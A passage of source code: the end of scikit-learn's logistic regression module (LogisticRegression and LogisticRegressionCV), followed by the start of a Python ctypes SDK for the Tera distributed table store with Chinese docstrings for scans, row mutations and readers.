the parameter ``loss="log"``).
sklearn.svm.LinearSVC : learns SVM models using the same algorithm.
Notes
-----
The underlying C implementation uses a random number generator to
select features when fitting the model. It is thus not uncommon,
to have slightly different results for the same input data. If
that happens, try with a smaller tol parameter.
References:
LIBLINEAR -- A Library for Large Linear Classification
http://www.csie.ntu.edu.tw/~cjlin/liblinear/
Hsiang-Fu Yu, Fang-Lan Huang, Chih-Jen Lin (2011). Dual coordinate descent
methods for logistic regression and maximum entropy models.
Machine Learning 85(1-2):41-75.
http://www.csie.ntu.edu.tw/~cjlin/papers/maxent_dual.pdf
"""
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
fit_intercept=True, intercept_scaling=1, class_weight=None,
random_state=None, solver='liblinear', max_iter=100):
super(LogisticRegression, self).__init__(
penalty=penalty, dual=dual, loss='lr', tol=tol, C=C,
fit_intercept=fit_intercept, intercept_scaling=intercept_scaling,
class_weight=class_weight, random_state=random_state,
solver=solver, max_iter=max_iter)
def predict_proba(self, X):
"""Probability estimates.
The returned estimates for all classes are ordered by the
label of classes.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in ``self.classes_``.
"""
return self._predict_proba_lr(X)
def predict_log_proba(self, X):
"""Log of probability estimates.
The returned estimates for all classes are ordered by the
label of classes.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
T : array-like, shape = [n_samples, n_classes]
Returns the log-probability of the sample for each class in the
model, where classes are ordered as they are in ``self.classes_``.
"""
return np.log(self.predict_proba(X))
class LogisticRegressionCV(LogisticRegression, BaseEstimator,
LinearClassifierMixin, _LearntSelectorMixin):
"""Logistic Regression CV (aka logit, MaxEnt) classifier.
This class implements logistic regression using liblinear, newton-cg or
LBFGS optimizer. The newton-cg and lbfgs solvers support only L2
regularization with primal formulation. The liblinear solver supports both
L1 and L2 regularization, with a dual formulation only for the L2 penalty.
For the grid of Cs values (that are set by default to be ten values in
a logarithmic scale between 1e-4 and 1e4), the best hyperparameter is
selected by the cross-validator StratifiedKFold, but it can be changed
using the cv parameter. In the case of newton-cg and lbfgs solvers,
we warm start along the path i.e guess the initial coefficients of the
present fit to be the coefficients got after convergence in the previous
fit, so in general it is supposed to be faster.
For a multiclass problem, the hyperparameters for each class are computed
using the best scores got by doing a one-vs-rest in parallel across all
folds and classes. Hence this is not the true multinomial loss.
Parameters
----------
Cs : list of floats | int
Each of the values in Cs describes the inverse of regularization
strength. If Cs is as an int, then a grid of Cs values are chosen
in a logarithmic scale between 1e-4 and 1e4.
Like in support vector machines, smaller values specify stronger
regularization.
fit_intercept : bool, default: True
Specifies if a constant (a.k.a. bias or intercept) should be
added the decision function.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
cv : integer or cross-validation generator
The default cross-validation generator used is Stratified K-Folds.
If an integer is provided, then it is the number of folds used.
See the module :mod:`sklearn.cross_validation` module for the
list of possible cross-validation objects.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
scoring : callabale
Scoring function to use as cross-validation criteria. For a list of
scoring functions that can be used, look at :mod:`sklearn.metrics`.
The default scoring option used is accuracy_score.
solver : {'newton-cg', 'lbfgs', 'liblinear'}
Algorithm to use in the optimization problem.
tol : float, optional
Tolerance for stopping criteria.
max_iter : int, optional
Maximum number of iterations of the optimization algorithm.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
n_jobs : int, optional
Number of CPU cores used during the cross-validation loop. If given
a value of -1, all cores are used.
verbose : bool | int
Amount of verbosity.
refit : bool
If set to True, the scores are averaged across all folds, and the
coefs and the C that corresponds to the best score is taken, and a
final refit is done using these parameters.
Otherwise the coefs, intercepts and C that correspond to the
best scores across folds are averaged.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Attributes
----------
coef_ : array, shape (1, n_features) or (n_classes, n_features)
Coefficient of the features in the decision function.
`coef_` is of shape (1, n_features) when the given problem
is binary.
`coef_` is readonly property derived from `raw_coef_` that
follows the internal memory layout of liblinear.
intercept_ : array, shape (1,) or (n_classes,)
Intercept (a.k.a. bias) added to the decision function.
It is available only when parameter intercept is set to True
and is of shape(1,) when the problem is binary.
Cs_ : array
Array of C i.e. inverse of regularization parameter values used
for cross-validation.
coefs_paths_ : array, shape (n_folds, len(Cs_), n_features) or
(n_folds, len(Cs_), n_features + 1)
dict with classes as the keys, and the path of coefficients obtained
during cross-validating across each fold and then across each Cs
after doing an OvA for the corresponding class.
Each dict value has shape (n_folds, len(Cs_), n_features) or
(n_folds, len(Cs_), n_features + 1) depending on whether the
intercept is fit or not.
scores_ : dict
dict with classes as the keys, and the values as the
grid of scores obtained during cross-validating each fold, after doing
an OvA for the corresponding class.
Each dict value has shape (n_folds, len(Cs))
C_ : array, shape (n_classes,) or (n_classes - 1,)
Array of C that maps to the best scores across every class. If refit is
set to False, then for each class, the best C is the average of the
C's that correspond to the best scores for each fold.
See also
--------
LogisticRegression
"""
def __init__(self, Cs=10, fit_intercept=True, cv=None, dual=False,
penalty='l2', scoring=None, solver='lbfgs', tol=1e-4,
max_iter=100, class_weight=None, n_jobs=1, verbose=False,
refit=True, intercept_scaling=1.):
self.Cs = Cs
self.fit_intercept = fit_intercept
self.cv = cv
self.dual = dual
self.penalty = penalty
self.scoring = scoring
self.tol = tol
self.max_iter = max_iter
self.class_weight = class_weight
self.n_jobs = n_jobs
self.verbose = verbose
self.solver = solver
self.refit = refit
self.intercept_scaling = 1.
def fit(self, X, y):
"""Fit the model according to the given training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target vector relative to X.
Returns
-------
self : object
Returns self.
"""
if self.solver != 'liblinear':
if self.penalty != 'l2':
raise ValueError("newton-cg and lbfgs solvers support only "
"l2 penalties.")
if self.dual:
raise ValueError("newton-cg and lbfgs solvers support only "
"the primal form.")
X = check_array(X, accept_sparse='csc', dtype=np.float64)
y = check_array(y, ensure_2d=False)
if y.ndim == 2 and y.shape[1] == 1:
warnings.warn(
"A column-vector y was passed when a 1d array was"
" expected. Please change the shape of y to "
"(n_samples, ), for example using ravel().",
DataConversionWarning
)
y = np.ravel(y)
check_consistent_length(X, y)
# init cross-validation generator
cv = _check_cv(self.cv, X, y, classifier=True)
folds = list(cv)
self._enc = LabelEncoder()
self._enc.fit(y)
labels = self.classes_
n_classes = len(labels)
if n_classes < 2:
raise ValueError("Number of classes have to be greater than one.")
if n_classes == 2:
# OvA in case of binary problems is as good as fitting
# the higher label
n_classes = 1
labels = labels[1:]
if self.class_weight and not(isinstance(self.class_weight, dict) or
self.class_weight == 'auto'):
raise ValueError("class_weight provided should be a "
"dict or 'auto'")
path_func = delayed(_log_reg_scoring_path)
fold_coefs_ = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
path_func(X, y, train, test, pos_class=label, Cs=self.Cs,
fit_intercept=self.fit_intercept, penalty=self.penalty,
dual=self.dual, solver=self.solver,
max_iter=self.max_iter, tol=self.tol,
class_weight=self.class_weight,
verbose=max(0, self.verbose - 1),
scoring=self.scoring,
intercept_scaling=self.intercept_scaling)
for label in labels
for train, test in folds)
coefs_paths, Cs, scores = zip(*fold_coefs_)
self.Cs_ = Cs[0]
coefs_paths = np.reshape(coefs_paths, (n_classes, len(folds),
len(self.Cs_), -1))
self.coefs_paths_ = dict(zip(labels, coefs_paths))
scores = np.reshape(scores, (n_classes, len(folds), -1))
self.scores_ = dict(zip(labels, scores))
self.C_ = list()
self.coef_ = list()
self.intercept_ = list()
for label in labels:
scores = self.scores_[label]
coefs_paths = self.coefs_paths_[label]
if self.refit:
best_index = scores.sum(axis=0).argmax()
C_ = self.Cs_[best_index]
self.C_.append(C_)
coef_init = np.mean(coefs_paths[:, best_index, :], axis=0)
w, _ = logistic_regression_path(
X, y, pos_class=label, Cs=[C_], solver=self.solver,
fit_intercept=self.fit_intercept, coef=coef_init,
max_iter=self.max_iter, tol=self.tol,
class_weight=self.class_weight,
verbose=max(0, self.verbose - 1))
w = w[0]
else:
# Take the best scores across every fold and the average of all
# coefficients corresponding to the best scores.
best_indices = np.argmax(scores, axis=1)
w = np.mean([
coefs_paths[i][best_indices[i]]
for i in range(len(folds))
], axis=0)
self.C_.append(np.mean(self.Cs_[best_indices]))
if self.fit_intercept:
self.coef_.append(w[:-1])
self.intercept_.append(w[-1])
else:
self.coef_.append(w)
self.intercept_.append(0.)
self.C_ = np.asarray(self.C_)
self.coef_ = np.asarray(self.coef_)
self.intercept_ = np.asarray(self.intercept_)
return self
| soulmachine/scikit-learn | sklearn/linear_model/logistic.py | Python | bsd-3-clause | 38,054 |
# -*- coding: utf-8 -*-
"""
Tera Python SDK. It needs a libtera_c.so
TODO(taocipian) __init__.py
"""
from ctypes import CFUNCTYPE, POINTER
from ctypes import byref, cdll, string_at
from ctypes import c_bool, c_char_p, c_void_p
from ctypes import c_uint32, c_int32, c_int64, c_ubyte, c_uint64
class Status(object):
""" status code """
# C++ tera.h ErrorCode
OK = 0
NotFound = 1
BadParam = 2
System = 3
Timeout = 4
Busy = 5
NoQuota = 6
NoAuth = 7
Unknown = 8
NotImpl = 9
reason_list_ = ["ok", "not found", "bad parameter",
"unknown error", "request timeout", "busy",
"no quota", "operation not permitted", "unknown error",
"not implemented"]
def __init__(self, c):
""" init """
self.c_ = c
if c < 0 or c > len(Status.reason_list_) - 1:
self.reason_ = "bad status code"
else:
self.reason_ = Status.reason_list_[c]
def GetReasonString(self):
"""
Returns:
(string) status string
"""
return Status.reason_list_[self.c_]
def GetReasonNumber(self):
"""
Returns:
(long) status code
"""
return self.c_
class ScanDescriptor(object):
""" scan操作描述符
scan出[start_key, end_key)范围内的所有数据,每个cell默认返回最新的1个版本
"""
def __init__(self, start_key):
"""
Args:
start_key(string): scan操作的起始位置,scan结果包含start_key
"""
self.desc = lib.tera_scan_descriptor(start_key,
c_uint64(len(start_key)))
def Destroy(self):
"""
销毁这个scan_descriptor,释放底层资源,以后不得再使用这个对象
"""
lib.tera_scan_descriptor_destroy(self.desc)
def SetEnd(self, end_key):
"""
不调用此函数时,end_key被置为“无穷大”
Args:
end_key(string): scan操作的终止位置,scan结果不包含end_key
"""
lib.tera_scan_descriptor_set_end(self.desc, end_key,
c_uint64(len(end_key)))
def SetMaxVersions(self, versions):
"""
不调用此函数时,默认每个cell只scan出最新版本
Args:
versions(long): scan时某个cell最多被选出多少个版本
"""
lib.tera_scan_descriptor_set_max_versions(self.desc, versions)
def SetBufferSize(self, buffer_size):
"""
服务端将读取的数据攒到buffer里,最多积攒到达buffer_size以后返回一次,
也有可能因为超时或者读取到达终点而buffer没有满就返回,默认值 64 * 1024
这个选项对scan性能有非常明显的影响,
我们的测试显示,1024*1024(1MB)在很多场景下都有比较好的表现,
建议根据自己的场景进行调优
Args:
buffer_size: scan操作buffer的size,单位Byte
"""
lib.tera_scan_descriptor_set_buffer_size(self.desc, buffer_size)
def SetPackInterval(self, interval):
"""
设置scan操作的超时时长,单位ms
服务端在scan操作达到约 interval 毫秒后尽快返回给client结果
Args:
iinterval(long): 一次scan的超时时长,单位ms
"""
lib.tera_scan_descriptor_set_pack_interval(self.desc, interval)
def AddColumn(self, cf, qu):
"""
scan时选择某个Column(ColumnFamily + Qualifier),其它Column过滤掉不返回给客户端
Args:
cf(string): 需要的ColumnFamily名
qu(string): 需要的Qualifier名
"""
lib.tera_scan_descriptor_add_column(self.desc, cf,
qu, c_uint64(len(qu)))
def AddColumnFamily(self, cf):
"""
类同 AddColumn, 这里选择整个 ColumnFamily
Args:
cf(string): 需要的ColumnFamily名
"""
lib.tera_scan_descriptor_add_column_family(self.desc, cf)
def SetTimeRange(self, start, end):
"""
设置返回版本的时间范围
C++接口用户注意:C++的这个接口里start和end参数的顺序和这里相反!
Args:
start(long): 开始时间戳(结果包含该值),
Epoch (00:00:00 UTC, January 1, 1970), measured in us
end(long): 截止时间戳(结果包含该值),
Epoch (00:00:00 UTC, January 1, 1970), measured in us
"""
lib.tera_scan_descriptor_set_time_range(self.desc, start, end)
class ResultStream(object):
""" scan操作返回的输出流
"""
def __init__(self, stream):
""" init """
self.stream = stream
def Destroy(self):
"""
销毁这个result_stream,释放底层资源,以后不得再使用这个对象
"""
lib.tera_result_stream_destroy(self.stream)
def Done(self):
""" 此stream是否已经读完
Returns:
(bool) 如果已经读完,则返回 true, 否则返回 false.
"""
err = c_char_p()
return lib.tera_result_stream_done(self.stream, byref(err))
def Next(self):
""" 迭代到下一个cell
"""
lib.tera_result_stream_next(self.stream)
def RowName(self):
"""
Returns:
(string) 当前cell对应的Rowkey
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_row_name(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Family(self):
"""
Returns:
(string) 当前cell对应的ColumnFamily
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_family(self.stream, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Qualifier(self):
"""
Returns:
(string) 当前cell对应的Qulifier
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_qualifier(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ColumnName(self):
"""
Returns:
(string) 当前cell对应的 ColumnName(即 ColumnFamily:Qulifier)
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_column_name(self.stream,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Value(self):
"""
Returns:
(string) 当前cell对应的value
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_result_stream_value(self.stream, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ValueInt64(self):
"""
Returns:
(long) 当前cell为一个int64计数器,取出该计数器的数值
对一个非int64计数器调用该方法,属未定义行为
"""
return lib.tera_result_stream_value_int64(self.stream)
def Timestamp(self):
"""
Returns:
(long) 当前cell对应的时间戳,
Epoch (00:00:00 UTC, January 1, 1970), measured in us
"""
return lib.tera_result_stream_timestamp(self.stream)
class Client(object):
""" 通过Client对象访问一个tera集群
使用建议:一个集群对应一个Client即可,如需访问多个Client,需要创建多个
"""
def __init__(self, conf_path, log_prefix):
"""
Raises:
TeraSdkException: 创建一个Client对象失败
"""
err = c_char_p()
self.client = lib.tera_client_open(conf_path, log_prefix, byref(err))
if self.client is None:
raise TeraSdkException("open client failed:" + str(err.value))
def Close(self):
"""
销毁这个client,释放底层资源,以后不得再使用这个对象
"""
lib.tera_client_close(self.client)
def OpenTable(self, name):
""" 打开名为<name>的表
Args:
name(string): 表名
Returns:
(Table) 打开的Table指针
Raises:
TeraSdkException: 打开table时出错
"""
err = c_char_p()
table_ptr = lib.tera_table_open(self.client, name, byref(err))
if table_ptr is None:
raise TeraSdkException("open table failed:" + err.value)
return Table(table_ptr)
MUTATION_CALLBACK = CFUNCTYPE(None, c_void_p)
class RowMutation(object):
""" 对某一行的变更
在Table.ApplyMutation()调用之前,
RowMutation的所有操作(如Put/DeleteColumn)都不会立即生效
"""
def __init__(self, mutation):
""" init """
self.mutation = mutation
def PutKV(self, value, ttl):
""" 写入(修改)值为<value>
Args:
value(string): cell的值
ttl: value 过期时间
"""
lib.tera_row_mutation_put_kv(self.mutation, value,
c_uint64(len(value)), c_int32(ttl))
def Put(self, cf, qu, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
value(string): cell的值
"""
lib.tera_row_mutation_put(self.mutation, cf,
qu, c_uint64(len(qu)),
value, c_uint64(len(value)))
def PutWithTimestamp(self, cf, qu, timestamp, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
指定版本(时间戳)为timestamp
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
timestamp(long): 版本号/时间戳
value(string): cell的值
"""
lib.tera_row_mutation_put_with_timestamp(self.mutation, cf,
qu, c_uint64(len(qu)),
timestamp,
value, c_uint64(len(value)))
def DeleteColumnAllVersions(self, cf, qu):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell的所有版本
如果没有用到多版本机制或本列只存储了一个版本(默认情况),
那么使用`DeleteColumnAllVersions`而不是`DeleteColumnWithVersion`来删除本列会更方便,
因为不用指定timestamp作为版本号。
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_row_mutation_delete_column_all_versions(self.mutation, cf,
qu, c_uint64(len(qu)))
def DeleteColumnWithVersion(self, cf, qu, ts):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell中Timestamp为<ts>的那个版本
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
ts(long): Timestamp(版本号)
"""
lib.tera_row_mutation_delete_column_with_version(self.mutation, cf,
qu, c_uint64(len(qu)),
ts)
def DeleteFamily(self, cf):
""" 删除ColumnFamily下所有列的所有版本
Args:
cf(string): ColumnFamily名
"""
lib.tera_row_mutation_delete_family(self.mutation, cf)
def DeleteRow(self):
""" 删除整行
"""
lib.tera_row_mutation_delete_row(self.mutation)
def RowKey(self):
"""
Returns:
(string): 此RowMutation对象的rowkey,例如可用在回调中
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_mutation_rowkey(self.mutation,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def SetCallback(self, callback):
""" 设置回调
调用此函数则本次变更为异步(Table.ApplyMutation()立即返回);
否则本次变更为同步(Table.ApplyMutation()等待写入操作完成后返回)。
Args:
callback(MUTATION_CALLBACK): 用户回调,不论任何情况,最终都会被调用
"""
lib.tera_row_mutation_set_callback(self.mutation, callback)
def GetStatus(self):
"""
返回本次Mutation的结果状态
Returns:
(class Status) 操作结果状态,可以获知成功或失败,若失败,具体原因
"""
return Status(lib.tera_row_mutation_get_status_code(self.mutation))
def Destroy(self):
"""
销毁这个mutation,释放底层资源,以后不得再使用这个对象
"""
lib.tera_row_mutation_destroy(self.mutation)
# Deprecated
def DeleteColumn(self, cf, qu):
""" 删除这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_row_mutation_delete_column(self.mutation, cf,
qu, c_uint64(len(qu)))
# Deprecated
def PutInt64(self, cf, qu, value):
""" 写入(修改)这一行上
ColumnFamily为<cf>, Qualifier为<qu>的cell值为<value>
Args:
cf(string): ColumnFamily名
qu(string): Qualifier名
value(long): cell的值
"""
lib.tera_row_mutation_put_int64(self.mutation, cf,
qu, c_uint64(len(qu)), value)
class Table(object):
""" 对表格的所有增删查改操作由此发起
通过Client.OpenTable()获取一个Table对象
"""
def __init__(self, table):
""" init """
self.table = table
def Close(self):
"""
销毁这个table,释放底层资源,以后不得再使用这个对象
"""
lib.tera_table_close(self.table)
def NewRowMutation(self, rowkey):
""" 生成一个对 rowkey 的RowMutation对象(修改一行)
一个RowMutation对某一行的操作(例如多列修改)是原子的
Args:
rowkey(string): 待变更的rowkey
Returns:
(class RowMutation): RowMutation对象
"""
return RowMutation(lib.tera_row_mutation(self.table, rowkey,
c_uint64(len(rowkey))))
def ApplyMutation(self, mutation):
""" 应用一次变更,
如果之前调用过 SetCallback() 则本次调用为异步,否则为同步
Args:
mutation(class RowMutation): RowMutation对象
"""
lib.tera_table_apply_mutation(self.table, mutation.mutation)
def NewRowReader(self, rowkey):
""" 生成一个对 rowkey 的RowReader对象(读取一行)
一个RowReader对某一行的操作(例如读取多列)是原子的
Args:
rowkey(string): 待读取的rowkey
Returns:
(class RowReader): RowReader对象
"""
return RowReader(lib.tera_row_reader(self.table, rowkey,
c_uint64(len(rowkey))))
def ApplyReader(self, reader):
""" 应用一次读取,
如果之前调用过 SetCallback() 则本次调用为异步,否则为同步
Args:
reader(class RowReader): RowReader对象
"""
lib.tera_table_apply_reader(self.table, reader.reader)
def IsPutFinished(self):
""" table的异步写操作是否*全部*完成
Returns:
(bool) 全部完成则返回true,否则返回false.
"""
return lib.tera_table_is_put_finished(self.table)
def IsGetFinished(self):
""" table的异步读操作是否*全部*完成
Returns:
(bool) 全部完成则返回true,否则返回false.
"""
return lib.tera_table_is_get_finished(self.table)
def BatchGet(self, row_reader_list):
""" 批量get
用法类似 ApplyReader
Args:
row_reader_list(RowReader): 预先构造好的RowReader列表
每一行的读取结果存储在row_reader_list里对应的每个RowReader内,
如果该行读取成功(即返回的状态码是OK),
那么可以调用诸如RowReader.Value()访问读取结果
否则读取出错,通过状态码确定原因。
用法详见sample.py
"""
num = len(row_reader_list)
r = list()
for i in row_reader_list:
r.append(i.reader)
reader_array = (c_void_p * num)(*r)
lib.tera_table_apply_reader_batch(self.table, reader_array, num)
def Get(self, rowkey, cf, qu, snapshot=0):
""" 同步get一个cell的值
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
snapshot(long): 快照,不关心的用户设置为0即可
Returns:
(string) cell的值
Raises:
TeraSdkException: 读操作失败
"""
err = c_char_p()
value = POINTER(c_ubyte)()
vallen = c_uint64()
result = lib.tera_table_get(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), byref(value), byref(vallen), byref(err),
c_uint64(snapshot)
)
if not result:
raise TeraSdkException("get record failed:" + err.value)
return copy_string_to_user(value, long(vallen.value))
def GetInt64(self, rowkey, cf, qu, snapshot):
""" 类同Get()接口,区别是将cell的内容作为int64计数器返回
对非int64计数器的cell调用此方法属于未定义行为
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
snapshot(long): 快照,不关心的用户设置为0即可
Returns:
(long) cell的数值
Raises:
TeraSdkException: 读操作失败
"""
err = c_char_p()
value = c_int64()
result = lib.tera_table_getint64(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), byref(value), byref(err),
c_uint64(snapshot)
)
if not result:
raise TeraSdkException("get record failed:" + err.value)
return long(value.value)
def Put(self, rowkey, cf, qu, value):
""" 同步put一个cell的值
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
value(string): cell的值
Raises:
TeraSdkException: 写操作失败
"""
err = c_char_p()
result = lib.tera_table_put(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), value, c_uint64(len(value)), byref(err)
)
if not result:
raise TeraSdkException("put record failed:" + err.value)
def BatchPut(self, row_mutation_list):
""" 批量put
用法类似 ApplyMutation
Args:
row_mutation_list(RowMutation): 预先构造好的RowMutation列表
每一行的写入操作返回状态存储在row_mutation_list里对应的每个RowMutation内,
如果写入失败,通过状态码确定原因。
用法详见sample.py
"""
num = len(row_mutation_list)
r = list()
for i in row_mutation_list:
r.append(i.mutation)
mutation_array = (c_void_p * num)(*r)
lib.tera_table_apply_mutation_batch(self.table, mutation_array, num)
def PutInt64(self, rowkey, cf, qu, value):
""" 类同Put()方法,区别是这里的参数value可以是一个数字(能够用int64表示)计数器
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
value(long): cell的数值,能够用int64表示
Raises:
TeraSdkException: 写操作失败
"""
err = c_char_p()
result = lib.tera_table_putint64(
self.table, rowkey, c_uint64(len(rowkey)), cf,
qu, c_uint64(len(qu)), value, byref(err)
)
if not result:
raise TeraSdkException("put record failed:" + err.value)
def Delete(self, rowkey, cf, qu):
""" 同步删除某个cell
Args:
rowkey(string): Rowkey的值
cf(string): ColumnFamily名
qu(string): Qualifier名
"""
lib.tera_table_delete(
self.table, rowkey, c_uint64(len(rowkey)),
cf, qu, c_uint64(len(qu))
)
def Scan(self, desc):
""" 发起一次scan操作
Args:
desc(ScanDescriptor): scan操作描述符
Raises:
TeraSdkException: scan失败
"""
err = c_char_p()
stream = lib.tera_table_scan(
self.table,
desc.desc,
byref(err)
)
if stream is None:
raise TeraSdkException("scan failed:" + err.value)
return ResultStream(stream)
READER_CALLBACK = CFUNCTYPE(None, c_void_p)
class RowReader(object):
""" 提供随机读取一行的功能
"""
def __init__(self, reader):
""" init """
self.reader = reader
def AddColumnFamily(self, cf):
""" 添加期望读取的ColumnFamily
默认读取一行(row)的全部ColumnFamily
Args:
cf(string): 期望读取的ColumnFamily
"""
lib.tera_row_reader_add_column_family(self.reader, cf)
def AddColumn(self, cf, qu):
""" 添加期望读取的Column
默认读取一行(row)的全部Column(ColumnFamily + Qualifier)
Args:
cf(string): 期望读取的ColumnFamily
qu(string): 期望读取的Qualifier
"""
lib.tera_row_reader_add_column(self.reader, cf, qu, c_uint64(len(qu)))
def SetCallback(self, callback):
""" 设置回调
调用此函数则本次随机读为异步(Table.ApplyReader()立即返回);
否则本次随机读为同步(Table.ApplyReader()等待读取操作完成后返回)
可以在回调中执行 Done() 和 Next() 对返回的结果进行迭代处理
Args:
callback(READER_CALLBACK): 用户回调,不论任何情况,最终都会被调用
"""
lib.tera_row_reader_set_callback(self.reader, callback)
def SetTimestamp(self, ts):
""" set timestamp """
lib.tera_row_reader_set_timestamp(self.reader, ts)
def SetTimeRange(self, start, end):
""" set time range """
lib.tera_row_reader_set_time_range(self.reader, start, end)
def SetSnapshot(self, snapshot):
""" set snapshot """
lib.tera_row_reader_set_snapshot(self.reader, snapshot)
def SetMaxVersions(self, versions):
""" set max versions """
lib.tera_row_reader_set_max_versions(self.reader, versions)
def SetTimeout(self, timeout):
""" set timeout """
lib.tera_row_reader_set_timeout(self.reader, timeout)
def Done(self):
""" 结果是否已经读完
Returns:
(bool) 如果已经读完,则返回 true, 否则返回 false.
"""
return lib.tera_row_reader_done(self.reader)
def Next(self):
""" 迭代到下一个cell
"""
lib.tera_row_reader_next(self.reader)
def RowKey(self):
"""
Returns:
(string) 当前cell对应的rowkey
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_rowkey(self.reader,
byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Value(self):
"""
Returns:
(string) 当前cell对应的value
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_value(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def ValueInt64(self):
"""
Returns:
(long) 当前cell对应的value
"""
return long(lib.tera_row_reader_value_int64(self.reader))
def Family(self):
"""
Returns:
(string) 当前cell对应的ColumnFamily
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_family(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Qualifier(self):
"""
Returns:
(string) 当前cell对应的Qulifier
"""
value = POINTER(c_ubyte)()
vallen = c_uint64()
lib.tera_row_reader_qualifier(self.reader, byref(value), byref(vallen))
return copy_string_to_user(value, long(vallen.value))
def Timestamp(self):
"""
Returns:
(long) 当前cell对应的时间戳,Unix time
"""
return lib.tera_row_reader_timestamp(self.reader)
def GetStatus(self):
"""
返回本次RowReader读取的结果状态
Returns:
(class Status) 操作结果状态,可以获知成功或失败,若失败,具体原因
"""
return Status(lib.tera_row_reader_get_status_code(self.reader))
def Destroy(self):
"""
销毁这个mutation,释放底层资源,以后不得再使用这个对象
"""
lib.tera_row_reader_destroy(self.reader)
class TeraSdkException(Exception):
""" exception """
def __init__(self, reason):
""" init """
self.reason = reason
def __str__(self):
""" str """
return self.reason
##########################
# 以下代码用户不需要关心 #
##########################
def init_function_prototype_for_scan():
""" scan """
######################
# scan result stream #
######################
lib.tera_result_stream_done.argtypes = [c_void_p,
POINTER(c_char_p)]
lib.tera_result_stream_done.restype = c_bool
lib.tera_result_stream_destroy.argtypes = [c_void_p]
lib.tera_result_stream_destroy.restype = None
lib.tera_result_stream_timestamp.argtypes = [c_void_p]
lib.tera_result_stream_timestamp.restype = c_int64
lib.tera_result_stream_column_name.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_column_name.restype = None
lib.tera_result_stream_family.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_family.restype = None
lib.tera_result_stream_next.argtypes = [c_void_p]
lib.tera_result_stream_next.restype = None
lib.tera_result_stream_qualifier.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_qualifier.restype = None
lib.tera_result_stream_row_name.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_row_name.restype = None
lib.tera_result_stream_value.argtypes = [c_void_p,
POINTER(POINTER(c_ubyte)),
POINTER(c_uint64)]
lib.tera_result_stream_value.restype = None
lib.tera_result_stream_value_int64.argtypes = [c_void_p]
lib.tera_result_stream_value_int64.restype = c_int64
###################
# scan descriptor #
###################
